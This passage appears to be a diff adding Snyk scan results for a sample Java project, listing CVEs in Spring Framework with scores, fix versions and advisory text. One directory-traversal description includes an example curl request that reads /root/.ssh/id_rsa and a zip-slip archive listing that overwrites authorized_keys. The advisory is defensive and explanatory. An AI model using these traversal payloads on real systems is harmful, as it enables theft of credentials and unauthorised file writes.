"[3.0.0.RELEASE,3.2.8.RELEASE)", + "[4.0.0.RELEASE,4.0.2.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.8.RELEASE", + "4.0.2.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/edba32b3093703d5e9ed42b5b8ec23ecc1998398%23diff-1f3f1d5cdab9ac92d1ca5ec7def8f131", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/fb0683c066e74e9667d6cd8c5fa01f674c68c3be%23diff-1f3f1d5cdab9ac92d1ca5ec7def8f131", + "title": "GitHub Commit" + }, + { + "url": "https://jira.spring.io/browse/SPR-11376", + "title": "Jira Issue" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0054", + "title": "NVD" + }, + { + "url": "http://www.pivotal.io/security/cve-2014-0054", + "title": "Pivotal Security" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 6.3, + "modificationTime": "2024-03-11T09:45:48.737689Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:09.210753Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:48.737689Z" + } + ], + "description": "## Overview\r\n[`org.springframework:spring-web`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-web%22)\r\nAffected versions of this package do not disable external entity 
resolution, which allows remote attackers to read arbitrary files, cause a denial of service and conduct CSRF attacks via crafted XML, aka an XML External Entity (XXE) issue. \r\n\r\n**NOTE:** this vulnerability exists because of an incomplete fix for [CVE-2013-4152](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-31330), [CVE-2013-7315](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30162), and [CVE-2013-6429](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30160).\r\n\r\n## References\r\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0054)", + "epssDetails": { + "percentile": "0.96745", + "probability": "0.25530", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-0054" + ], + "CWE": [ + "CWE-352" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2017-02-22T07:28:31.538000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2014-04-17T14:55:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2014-06-06T21:43:43Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:45:48.737689Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.8.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586", + "title": "Open Redirect", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + 
"credit": [ + "Sean Pesce" + ], + "semver": { + "vulnerable": [ + "[,5.3.32)", + "[6.0.0,6.0.17)", + "[6.1.0,6.1.4)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.32", + "6.0.17", + "6.1.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/120ea0a51c63171e624ca55dbd7cae627d53a042", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2024-22243", + "title": "Spring Advisory" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.1, + "cvssVersion": "3.1", + "modificationTime": "2024-07-02T15:25:03.264548Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` parses an externally provided URL, and the application subsequently uses that URL. 
If it contains hierarchical components such as path, query, and fragment it may evade validation.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.32, 6.0.17, 6.1.4 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/120ea0a51c63171e624ca55dbd7cae627d53a042)\n- [Spring Advisory](https://spring.io/security/cve-2024-22243)\n", + "epssDetails": { + "percentile": "0.09306", + "probability": "0.00043", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-22243" + ], + "CWE": [ + "CWE-601", + "CWE-918" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2024-02-22T09:39:25.202849Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-02-21T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2024-02-22T15:48:30.525565Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-07-02T15:25:03.264548Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.3.32" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790", + "title": "Open Redirect", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "credit": [ + "threedr3am" + ], + "semver": { + "vulnerable": [ + "[,5.3.33)", + "[6.0.0, 6.0.18)", + "[6.1.0, 6.1.5)" + ] + }, + "exploit": "Not Defined", + 
"fixedIn": [ + "5.3.33", + "6.0.18", + "6.1.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/1d2b55e670bcdaa19086f6af9a5cec31dd0390f0", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2024-22259", + "title": "Spring Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-17T13:32:42.716493Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.1, + "cvssVersion": "3.1", + "modificationTime": "2024-07-02T15:25:03.250566Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-17T13:32:42.716493Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when using `UriComponentsBuilder` to parse an externally provided `URL` and perform validation checks on the host of the parsed URL. 
\r\n\r\n**Note:**\r\nThis is the same as [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.33, 6.0.18, 6.1.5 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/1d2b55e670bcdaa19086f6af9a5cec31dd0390f0)\n- [Spring Advisory](https://spring.io/security/cve-2024-22259)\n", + "epssDetails": { + "percentile": "0.26310", + "probability": "0.00061", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-22259" + ], + "CWE": [ + "CWE-601" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2024-03-15T10:11:04.950943Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-03-14T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2024-03-15T10:42:12.997061Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-07-02T15:25:03.250566Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.3.33" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980", + "title": "Open Redirect", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "credit": [ + "L0ne1y" + ], + "semver": { + "vulnerable": [ + "[,5.3.34)", + "[6.0.0, 6.0.19)", + "[6.1.0, 6.1.6)" + ] + 
}, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.34", + "6.0.19", + "6.1.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.4, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://spring.io/security/cve-2024-22262", + "title": "Spring Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-04-16T13:32:25.163950Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.4, + "cvssVersion": "3.1", + "modificationTime": "2024-04-12T08:32:41.960388Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-04-16T13:32:25.163950Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` is used to parse an externally provided URL and perform validation checks on the host of the parsed URL. 
\n\n**Note:**\nThis is the same as [CVE-2024-22259](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790) and [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.34, 6.0.19, 6.1.6 or higher.\n## References\n- [Spring Advisory](https://spring.io/security/cve-2024-22262)\n", + "epssDetails": { + "percentile": "0.09306", + "probability": "0.00043", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-22262" + ], + "CWE": [ + "CWE-601" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2024-04-12T08:32:41.735891Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-04-11T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2024-04-12T08:32:41.913608Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-04-16T13:32:25.163950Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "title": "Improper Output Neutralization for Logs", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Dennis Kennedy" + ], + "semver": { + "vulnerable": [ + "[5.3.0,5.3.12)", + "[,5.2.18)" + ] + }, + "exploit": "Not 
Defined", + "fixedIn": [ + "5.3.12", + "5.2.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5", + "title": "Github Commit" + }, + { + "url": "https://pivotal.io/security/cve-2021-22096", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:20.847607Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to 
Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n## References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n", + "epssDetails": { + "percentile": "0.34533", + "probability": "0.00079", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22096" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-02T11:14:46.053186Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-10-27T12:52:59Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2021-10-27T16:55:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.086414Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.2.18.RELEASE", + "org.springframework:spring-core@5.2.18.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "psytester" 
+ ], + "semver": { + "vulnerable": [ + "[,5.2.19.RELEASE)", + "[5.3.0,5.3.14)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.19.RELEASE", + "5.3.14" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://pivotal.io/security/cve-2021-22060", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:24.703024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user 
provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n## References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n", + "epssDetails": { + "percentile": "0.23203", + "probability": "0.00054", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22060" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-06T12:31:26.181234Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-01-06T11:18:34Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2022-01-06T17:17:24.995166Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:10.667113Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.2.19.RELEASE", + "org.springframework:spring-core@5.2.19.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ 
+ "3.2.9.RELEASE", + "4.0.5.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "filePath": "org/springframework/util/StringUtils.java", + "className": "StringUtils", + "functionName": "cleanPath" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/16414", + "title": "GitHub Issue" + }, + { + "url": "https://jira.spring.io/browse/SPR-12354", + "title": "Jira Issue" + }, + { + "url": "http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html", + "title": "JVNDB" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", + "title": "NVD" + }, + { + "url": "https://pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "http://www.pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1131882", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-06T13:56:25.325641Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. 
\n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n", + "epssDetails": { + "percentile": "0.69801", + "probability": "0.00301", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3578" + ], + "CWE": [ + "CWE-22" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:31.465000Z", + 
"functions_new": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "className": "org.springframework.util.StringUtils", + "functionName": "cleanPath" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2014-09-05T17:16:58Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2014-09-05T17:16:58Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:07.314890Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.9.RELEASE", + "org.springframework:spring-core@3.2.9.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "title": 